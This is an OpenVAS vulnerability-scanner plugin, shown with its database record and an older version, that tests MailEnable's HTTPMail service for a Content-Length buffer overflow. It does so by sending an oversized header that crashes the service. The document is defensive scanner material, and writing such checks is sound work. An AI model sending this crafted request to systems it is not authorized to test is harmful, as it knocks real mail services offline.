MailEnable HTTPMail Service Content-Length Overflow Vulnerability
2005-11-03T00:00:00
ID OPENVAS:136141256231014655 Type openvas Reporter This script is Copyright (C) 2004 George A. Theall Modified 2019-04-11T00:00:00
Description
The target is running at least one instance of MailEnable that has a
flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and Enterprise Editions.
# OpenVAS Vulnerability Test
# $Id: mailenable_httpmail_content_length_overflow.nasl 9348 2018-04-06 07:01:19Z cfischer $
# Description: MailEnable HTTPMail Service Content-Length Overflow Vulnerability
#
# Authors:
# George A. Theall, <theall@tifaware.com>
#
# Copyright:
# Copyright (C) 2004 George A. Theall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.14655");
script_version("2019-04-11T14:06:24+0000");
script_tag(name:"last_modification", value:"2019-04-11 14:06:24 +0000 (Thu, 11 Apr 2019)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_bugtraq_id(10838);
script_xref(name:"OSVDB", value:"8301");
script_name("MailEnable HTTPMail Service Content-Length Overflow Vulnerability");
script_category(ACT_DENIAL);
script_copyright("This script is Copyright (C) 2004 George A. Theall");
script_family("Denial of Service");
script_dependencies("gb_get_http_banner.nasl");
script_mandatory_keys("MailEnable/banner");
script_require_ports("Services/www", 8080);
script_tag(name:"solution", value:"Upgrade to MailEnable Professional / Enterprise 1.2 or later or apply
the HTTPMail hotfix from 9th August 2004.");
script_tag(name:"summary", value:"The target is running at least one instance of MailEnable that has a
flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and Enterprise Editions.");
script_tag(name:"insight", value:"The flaw can be exploited by issuing an HTTP GET
with an Content-Length header exceeding 100 bytes, which causes a fixed-length buffer to overflow,
crashing the HTTPMail service and possibly allowing for arbitrary code execution.");
script_xref(name:"URL", value:"http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
port = get_http_port(default:8080);
banner = get_http_banner(port:port);
if(!banner || ! egrep(pattern:"^Server: .*MailEnable", string:banner))
exit(0);
if(http_is_dead(port:port))
exit(0);
req = string("GET / HTTP/1.0\r\n",
"Host: ", get_host_ip(), "\r\n",
"Content-Length: ", crap(length:100, data:"9"), "XXXX\r\n",
"\r\n");
res = http_send_recv(port:port, data:req);
if(!res && http_is_dead(port:port)) {
security_message(port:port);
exit(0);
}
exit(99);
{"pluginID": "136141256231014655", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mailenable_httpmail_content_length_overflow.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: MailEnable HTTPMail Service Content-Length Overflow Vulnerability\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14655\");\n script_version(\"2019-04-11T14:06:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-11 14:06:24 +0000 (Thu, 11 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(10838);\n script_xref(name:\"OSVDB\", value:\"8301\");\n script_name(\"MailEnable HTTPMail Service Content-Length Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MailEnable/banner\");\n script_require_ports(\"Services/www\", 8080);\n\n script_tag(name:\"solution\", value:\"Upgrade to MailEnable Professional / Enterprise 1.2 or later or apply\n the HTTPMail hotfix from 9th August 2004.\");\n\n script_tag(name:\"summary\", value:\"The target is running at least one instance of MailEnable that has a\n flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and Enterprise Editions.\");\n\n script_tag(name:\"insight\", value:\"The flaw can be exploited by issuing an HTTP GET\n with an Content-Length header exceeding 100 bytes, which causes a fixed-length buffer to overflow,\n crashing the HTTPMail service and possibly allowing for arbitrary code execution.\");\n\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif(!banner || ! egrep(pattern:\"^Server: .*MailEnable\", string:banner))\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nreq = string(\"GET / HTTP/1.0\\r\\n\",\n \"Host: \", get_host_ip(), \"\\r\\n\",\n \"Content-Length: \", crap(length:100, data:\"9\"), \"XXXX\\r\\n\",\n \"\\r\\n\");\nres = http_send_recv(port:port, data:req);\nif(!res && http_is_dead(port:port)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote web server is affected by a buffer overflow vulnerability. \n\nDescription :\n\nThe target is running at least one instance of MailEnable that has a\nflaw in the HTTPMail service (MEHTTPS.exe) in the Professional and\nEnterprise Editions. The flaw can be exploited by issuing an HTTP GET\nwith an Content-Length header exceeding 100 bytes, which causes a\nfixed-length buffer to overflow, crashing the HTTPMail service and\npossibly allowing for arbitrary code execution.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-04-06T11:15:51", "references": []}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "1232c84677cf6a2a39e0b84a621c4a9eac415bf8aa4f01be4a128e5900f77e0a", "hashmap": [{"hash": "4da2581fffdd1ea6e30c7be2752b49d2", "key": "sourceData"}, {"hash": "ed312261ec82d978e02b67972105481f", "key": "title"}, {"hash": "5d5d9c61363709e3561fa6bbb417de65", "key": "href"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "1379a50389c6f193209456729856b1a5", "key": "reporter"}, {"hash": "ef441fb54e7a80f3f766cfc26df8408c", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "df034d9b90ece22f6e868d36506db720", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5961dade9ee30df7f13b87729991b0e4", "key": "references"}, {"hash": "67b560e7257aba56300d6c8644e6e1a3", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014655", "id": "OPENVAS:136141256231014655", "lastseen": "2018-04-06T11:15:51", "modified": "2018-04-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "136141256231014655", "published": "2005-11-03T00:00:00", "references": ["8301", "http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html"], "reporter": "This script is Copyright (C) 2004 George A. Theall", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mailenable_httpmail_content_length_overflow.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: MailEnable HTTPMail Service Content-Length Overflow Vulnerability\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote web server is affected by a buffer overflow vulnerability. \n\nDescription :\n\nThe target is running at least one instance of MailEnable that has a\nflaw in the HTTPMail service (MEHTTPS.exe) in the Professional and\nEnterprise Editions. The flaw can be exploited by issuing an HTTP GET\nwith an Content-Length header exceeding 100 bytes, which causes a\nfixed-length buffer to overflow, crashing the HTTPMail service and\npossibly allowing for arbitrary code execution.\";\n\ntag_solution = \"Upgrade to MailEnable Professional / Enterprise 1.2 or later or apply\nthe HTTPMail hotfix from 9th August 2004 found at\nhttp://www.mailenable.com/hotfix/\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14655\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(10838);\n script_xref(name:\"OSVDB\", value:\"8301\");\n script_name(\"MailEnable HTTPMail Service Content-Length Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MailEnable/banner\");\n script_require_ports(\"Services/www\", 8080);\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\nif (http_is_dead(port:port)) exit(0);\n\nhost = http_host_name(port:port);\n\n# Make sure banner's from MailEnable.\nbanner = get_http_banner(port:port);\nif (banner && egrep(pattern:\"^Server: .*MailEnable\", string:banner)) {\n # Try to bring it down.\n req = string(\n \"GET / HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Length: \", crap(length:100, data:\"9\"), \"XXXX\\r\\n\",\n \"\\r\\n\"\n );\n debug_print(\"req='\", req, \"'.\\n\");\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n debug_print(\"res='\", res, \"'.\\n\");\n\n # There's a problem if the web server is down.\n if (isnull(res)) {\n if (http_is_dead(port:port)) security_message(port);\n }\n}\n", "title": "MailEnable HTTPMail Service Content-Length Overflow Vulnerability", "type": "openvas", "viewCount": 1}, "differentElements": ["description", "modified", "naslFamily", "sourceData"], "edition": 1, "lastseen": "2018-04-06T11:15:51"}], "description": "The target is running at least one instance of MailEnable that has a\n flaw in the HTTPMail service (MEHTTPS.exe) in the Professional and Enterprise Editions.", "reporter": "This script is Copyright (C) 2004 George A. Theall", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014655", "type": "openvas", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "aefc0fac3bd90065db4c1805ef94d06f"}, {"key": "href", "hash": "5d5d9c61363709e3561fa6bbb417de65"}, {"key": "modified", "hash": "351547ca989b94e197622f01947baa43"}, {"key": "naslFamily", "hash": "711d051a7c0db70ca108b804aa5319ac"}, {"key": "pluginID", "hash": "67b560e7257aba56300d6c8644e6e1a3"}, {"key": "published", "hash": "df034d9b90ece22f6e868d36506db720"}, {"key": "references", "hash": "5961dade9ee30df7f13b87729991b0e4"}, {"key": "reporter", "hash": "1379a50389c6f193209456729856b1a5"}, {"key": "sourceData", "hash": "47a1c63a269d0c72c7ca4857569457ef"}, {"key": "title", "hash": "ed312261ec82d978e02b67972105481f"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "viewCount": 2, "references": ["8301", "http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1314.html"], "lastseen": "2019-04-12T13:14:39", "published": "2005-11-03T00:00:00", "naslFamily": "Denial of Service", "objectVersion": "1.3", "cvelist": [], "id": "OPENVAS:136141256231014655", "hash": "72895e24bb9ea01a05195d38e9b0016455c5bdcbd11aaa6aa82a70a5c3072c59", "modified": "2019-04-11T00:00:00", "title": "MailEnable HTTPMail Service Content-Length Overflow Vulnerability", "edition": 2, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "scanner", "enchantments": {"dependencies": {"references": [], "modified": "2019-04-12T13:14:39"}, "score": {"value": 0.1, "vector": "NONE", "modified": "2019-04-12T13:14:39"}, "vulnersScore": 0.1}, "scheme": null}
